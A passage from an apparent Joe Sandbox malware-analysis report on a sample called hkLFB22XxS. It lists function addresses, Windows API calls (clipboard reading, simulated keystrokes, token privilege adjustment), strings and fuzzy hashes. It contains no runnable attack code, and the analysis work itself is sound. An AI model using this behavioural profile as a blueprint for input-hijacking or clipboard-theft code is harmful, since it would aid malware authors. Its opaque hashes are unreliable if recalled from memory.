                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 4ec0c472b3921ede1a52bc5d5323434bfbde1aaab88f1aabd6b1bbd8ebd15a3d
                                                            • Instruction ID: 204312f570fb74d3882225d0827d67232b3df10dfe8985d1321dc73604e3f4af
                                                            • Opcode Fuzzy Hash: 4ec0c472b3921ede1a52bc5d5323434bfbde1aaab88f1aabd6b1bbd8ebd15a3d
                                                            • Instruction Fuzzy Hash: 90E0CD3690422C57C720E69C9C05FFA77EDEF887A0F0401B6FD0CD7209DA649CC18691
                                                            Function 00879129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction ID: 22a689ffe0709bf9f4ffdf014d37811b970d291a77d03f131f4b973a9c55f703
                                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction Fuzzy Hash: 5AE09AB0214B009FDB388A28D811BE373E0FB06315F00081CF2EEC3342EB62B8418B69
                                                            Function 00815DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0084E16B,?,?,00000000), ref: 00815DBF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 88b57a70b4e557cea9067132df0ea3da6544b27dba1c54371ecc2dbf4ef84c91
                                                            • Instruction ID: e7f8523bfe67edf9167dfd8ffb4a09745e9fbd2459fa5fff4e62a54a4a1bbb80
                                                            • Opcode Fuzzy Hash: 88b57a70b4e557cea9067132df0ea3da6544b27dba1c54371ecc2dbf4ef84c91
                                                            • Instruction Fuzzy Hash: 80D0C77464020CBFE714DB80DC46FA9777CE705710F100195FE0496690D6B27D508795
                                                            Function 0083548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: ccc1194e2ae7f85a7f4ef3cf9c4fe9dbcd3645a250efe1608b1f8b830e3affd5
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 8DB092B684020C77DE012E86EC02A593B19AB80678F808020FB0C18162A673A6A096CE
                                                            Function 0087D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0087D46A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 9dc583733d3c270db39efad7bde1ae368e98922cfaddf5439d122496c878fb9d
                                                            • Instruction ID: a3beb254cb4f18a5de173d85299d9aee43b675ad153d509a56337997f4f2be02
                                                            • Opcode Fuzzy Hash: 9dc583733d3c270db39efad7bde1ae368e98922cfaddf5439d122496c878fb9d
                                                            • Instruction Fuzzy Hash: A0711C302047018FC714EF28D491AAAB7F5FF88314F04496DF59ADB2A6DB30E949CB56
                                                            Function 00830E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: dcade72d687d186e650e88b2d380df5471e629983c2a5ddae80b4bbc30d764f8
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: C831C074A00109DBC718DF58D4A0969F7A6FF99304F688AA5E40ACB651DB31EDC1CFC0
                                                            Function 024422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 024422B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: a6e6615032a69eb59c4fd36bdc081b8ac1fa3cd918bfb703f3246a4b4ee39775
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 61E0E67494010EDFDB00EFB4D64969E7FB4FF04301F100161FD01D2280DA709D508A72

                                                            Non-executed Functions

                                                            Function 0089CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0089CE50
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0089CE91
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0089CED6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0089CF00
                                                            • SendMessageW.USER32 ref: 0089CF29
                                                            • _wcsncpy.LIBCMT ref: 0089CFA1
                                                            • GetKeyState.USER32(00000011), ref: 0089CFC2
                                                            • GetKeyState.USER32(00000009), ref: 0089CFCF
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0089CFE5
                                                            • GetKeyState.USER32(00000010), ref: 0089CFEF
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0089D018
                                                            • SendMessageW.USER32 ref: 0089D03F
                                                            • SendMessageW.USER32(?,00001030,?,0089B602), ref: 0089D145
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0089D15B
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0089D16E
                                                            • SetCapture.USER32(?), ref: 0089D177
                                                            • ClientToScreen.USER32(?,?), ref: 0089D1DC
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0089D1E9
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0089D203
                                                            • ReleaseCapture.USER32 ref: 0089D20E
                                                            • GetCursorPos.USER32(?), ref: 0089D248
                                                            • ScreenToClient.USER32(?,?), ref: 0089D255
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0089D2B1
                                                            • SendMessageW.USER32 ref: 0089D2DF
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0089D31C
                                                            • SendMessageW.USER32 ref: 0089D34B
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0089D36C
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0089D37B
                                                            • GetCursorPos.USER32(?), ref: 0089D39B
                                                            • ScreenToClient.USER32(?,?), ref: 0089D3A8
                                                            • GetParent.USER32(?), ref: 0089D3C8
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0089D431
                                                            • SendMessageW.USER32 ref: 0089D462
                                                            • ClientToScreen.USER32(?,?), ref: 0089D4C0
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0089D4F0
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0089D51A
                                                            • SendMessageW.USER32 ref: 0089D53D
                                                            • ClientToScreen.USER32(?,?), ref: 0089D58F
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0089D5C3
                                                              • Part of subcall function 008125DB: GetWindowLongW.USER32(?,000000EB), ref: 008125EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089D65F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3977979337-4164748364
                                                            • Opcode ID: 967a87d9d031a7a55551c3e38d4b1817a79348773c352a6f0f5928a1a9195ae6
                                                            • Instruction ID: 58d7362e27bdb2780ef14261055720ff42eed108d7151482be392a9f21a0b923
                                                            • Opcode Fuzzy Hash: 967a87d9d031a7a55551c3e38d4b1817a79348773c352a6f0f5928a1a9195ae6
                                                            • Instruction Fuzzy Hash: 1A42B030104345AFDB25EF28C854FAABBE6FF49314F18062EF656C72A1D7329854CB96
                                                            Function 0089804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0089873F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 3850602802-328681919
                                                            • Opcode ID: ecfc55c5416246414e7ccac267c5287c25e525755a3154ab18c32d881c65e8b4
                                                            • Instruction ID: f162827eb6fddfabf0afb03ce33dec34f893d6def10c6cf4674a26aaa257540f
                                                            • Opcode Fuzzy Hash: ecfc55c5416246414e7ccac267c5287c25e525755a3154ab18c32d881c65e8b4
                                                            • Instruction Fuzzy Hash: D112A171500209EBEF25AF68CC49FAA7BB9FF46714F284129F516EA2E1DF708941CB50
                                                            Function 0082710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-1798697756
                                                            • Opcode ID: 686185a739047d5d4405381b0b190e8c67116bcc6e0ac687c4991c1c3aa9d492
                                                            • Instruction ID: 6a3cb59c6f26db3c76156a10fa6aef36743eab094ab022d408ff1efab83678cd
                                                            • Opcode Fuzzy Hash: 686185a739047d5d4405381b0b190e8c67116bcc6e0ac687c4991c1c3aa9d492
                                                            • Instruction Fuzzy Hash: 2C939071A04219DFDB24CF98D881BADB7B1FF48714F26816AE945EB381E7709E81CB50
                                                            Function 00814A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00814A3D
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0084DA8E
                                                            • IsIconic.USER32(?), ref: 0084DA97
                                                            • ShowWindow.USER32(?,00000009), ref: 0084DAA4
                                                            • SetForegroundWindow.USER32(?), ref: 0084DAAE
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0084DAC4
                                                            • GetCurrentThreadId.KERNEL32 ref: 0084DACB
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0084DAD7
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0084DAE8
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0084DAF0
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0084DAF8
                                                            • SetForegroundWindow.USER32(?), ref: 0084DAFB
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB10
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB1B
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB25
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB2A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB33
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB38
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB42
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB47
                                                            • SetForegroundWindow.USER32(?), ref: 0084DB4A
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0084DB71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: a4390a2abd4d5e624229da94fdefd5c46d33876e00262dce09b3501b51b4808a
                                                            • Instruction ID: ed815414bc5b98dd5a09ac4e016dcd5456c34e1e0d51ce875b1610cf6cd53b01
                                                            • Opcode Fuzzy Hash: a4390a2abd4d5e624229da94fdefd5c46d33876e00262dce09b3501b51b4808a
                                                            • Instruction Fuzzy Hash: DF316371A4031CBBEB256FA19C49F7F3E6CFB44B60F154026FB05EA1D1D6B05D10AAA1
                                                            Function 00868858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00868CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00868D0D
                                                              • Part of subcall function 00868CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00868D3A
                                                              • Part of subcall function 00868CC3: GetLastError.KERNEL32 ref: 00868D47
                                                            • _memset.LIBCMT ref: 0086889B
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008688ED
                                                            • CloseHandle.KERNEL32(?), ref: 008688FE
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00868915
                                                            • GetProcessWindowStation.USER32 ref: 0086892E
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00868938
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00868952
                                                              • Part of subcall function 00868713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00868851), ref: 00868728
                                                              • Part of subcall function 00868713: CloseHandle.KERNEL32(?,?,00868851), ref: 0086873A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 6680f7eb6513a0b2fa3a3a293ad56d1e1bcb6c2d00855816b739264d446af71c
                                                            • Instruction ID: b1aa9b7601d30572fc9dad266c85a3b8c5ec9a3f44ef27236cf957bce9d3cf5f
                                                            • Opcode Fuzzy Hash: 6680f7eb6513a0b2fa3a3a293ad56d1e1bcb6c2d00855816b739264d446af71c
                                                            • Instruction Fuzzy Hash: 8E8158B1900219EFDF11DFE4DC45AAE7BB8FF04305F09426AFD18E6261DB318A149B62
                                                            Function 0088425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(0089F910), ref: 00884284
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00884292
                                                            • GetClipboardData.USER32(0000000D), ref: 0088429A
                                                            • CloseClipboard.USER32 ref: 008842A6
                                                            • GlobalLock.KERNEL32(00000000), ref: 008842C2
                                                            • CloseClipboard.USER32 ref: 008842CC
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 008842E1
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 008842EE
                                                            • GetClipboardData.USER32(00000001), ref: 008842F6
                                                            • GlobalLock.KERNEL32(00000000), ref: 00884303
                                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00884337
                                                            • CloseClipboard.USER32 ref: 00884447
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 27da44da9ad8f98e3218e69695680f90397a83ae22ab8f6e25bc078b9534c2ed
                                                            • Instruction ID: c902c9690a9ca5c5db918ff51c45661a5fbefe0b66cafc70e4059b7ac3d8e6ce
                                                            • Opcode Fuzzy Hash: 27da44da9ad8f98e3218e69695680f90397a83ae22ab8f6e25bc078b9534c2ed
                                                            • Instruction Fuzzy Hash: 66518272208306ABD305FF64EC85F6E77A8FF94B00F14452AF695D21A2DB70D9448B63
                                                            Function 0087C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0087C9F8
                                                            • FindClose.KERNEL32(00000000), ref: 0087CA4C
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0087CA71
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0087CA88
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0087CAAF
                                                            • __swprintf.LIBCMT ref: 0087CAFB
                                                            • __swprintf.LIBCMT ref: 0087CB3E
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • __swprintf.LIBCMT ref: 0087CB92
                                                              • Part of subcall function 008338D8: __woutput_l.LIBCMT ref: 00833931
                                                            • __swprintf.LIBCMT ref: 0087CBE0
                                                              • Part of subcall function 008338D8: __flsbuf.LIBCMT ref: 00833953
                                                              • Part of subcall function 008338D8: __flsbuf.LIBCMT ref: 0083396B
                                                            • __swprintf.LIBCMT ref: 0087CC2F
                                                            • __swprintf.LIBCMT ref: 0087CC7E
                                                            • __swprintf.LIBCMT ref: 0087CCCD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 35726b73981abdb9f473fb9481dc749250f06b263f42d11c2fb2413668df8dce
                                                            • Instruction ID: 9e387959fb8625c16cab16a3a943d89478e2645f329299921ca25943a73bfe01
                                                            • Opcode Fuzzy Hash: 35726b73981abdb9f473fb9481dc749250f06b263f42d11c2fb2413668df8dce
                                                            • Instruction Fuzzy Hash: 54A13AB1508214ABC704EBA8C896DAFB7ECFF94700F40492DF596C3191EA34DA49CB63
                                                            Function 0087F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0087F221
                                                            • _wcscmp.LIBCMT ref: 0087F236
                                                            • _wcscmp.LIBCMT ref: 0087F24D
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0087F25F
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0087F279
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0087F291
                                                            • FindClose.KERNEL32(00000000), ref: 0087F29C
